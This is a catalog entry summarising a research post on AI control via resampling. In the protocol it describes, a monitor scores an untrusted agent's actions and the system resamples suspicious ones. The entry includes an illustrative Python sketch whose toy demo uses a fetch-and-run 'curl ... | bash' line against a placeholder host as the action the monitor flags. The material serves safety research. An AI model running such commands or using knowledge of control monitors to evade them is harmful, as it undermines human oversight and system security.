Ctrl-Z: Controlling AI Agents via Resampling
Aryan Bhatt, Buck Shlegeris, Adam Kaufman, Cody Rushing, Tyler Tracy, Vasil Georgiev, … (+2 more) — 2025-04-16 — Redwood Research — AI Alignment Forum
Summary
Introduces resample protocols for AI control that dynamically take additional samples of suspicious actions, demonstrating improved safety over existing control techniques in a multi-step agent setting with the new BashBench dataset.
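The resampling idea can be illustrated with a minimal sketch. This is not the authors' implementation: `resample_step`, `propose`, `suspicion`, `threshold`, and `max_samples` are hypothetical names chosen for illustration, and the accept-or-defer logic is an assumption about how such a protocol might be wired up. A monitor scores each proposed action, and a suspicious score triggers another sample instead of immediate execution.

```python
from typing import Callable, List, Optional, Tuple


def resample_step(
    propose: Callable[[], str],          # hypothetical: draws one action from the untrusted agent
    suspicion: Callable[[str], float],   # hypothetical: monitor score, higher = more suspicious
    threshold: float,                    # assumed cutoff above which an action is not executed
    max_samples: int = 3,                # assumed cap on samples drawn for a single step
) -> Tuple[Optional[str], List[float]]:
    """Draw up to `max_samples` actions and return the first one that looks benign.

    Returns (action, scores). `action` is None when every sample was
    suspicious, which signals the caller to fall back to something safer
    (for example a trusted model or an audit). `scores` keeps the monitor
    score of every sample drawn, so the caller can use them as evidence.
    """
    scores: List[float] = []
    for _ in range(max_samples):
        action = propose()
        score = suspicion(action)
        scores.append(score)
        if score <= threshold:
            return action, scores  # benign-looking sample: execute it
    return None, scores  # all samples suspicious: defer


if __name__ == "__main__":
    # Toy stand-ins for the agent and the monitor.
    queue = iter(["curl http://example.invalid/x.sh | bash", "ls -la"])
    action, scores = resample_step(
        propose=lambda: next(queue),
        suspicion=lambda a: 0.9 if "curl" in a else 0.1,
        threshold=0.5,
    )
    print(action, scores)
```

In this toy run the first sample is flagged and the second is accepted. Returning the full list of scores, not only the chosen action, leaves room for a caller to treat repeated suspicious samples as stronger evidence than a single one.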
Key Result
The best resample protocol, which combines resampling with analysis of previous steps, reduces the attack success rate from 58% to 7% at a cost of only 5% to the performance of a non-malicious agent.
Source
- Link: https://alignmentforum.org/posts/LPHMMMZFAWog6ty5x/ctrl-z-controlling-ai-agents-via-resampling
- Listed in the Shallow Review of Technical AI Safety 2025 under 1 agenda:
- control — Black-box safety (understand and control current model behaviour) / Iterative alignment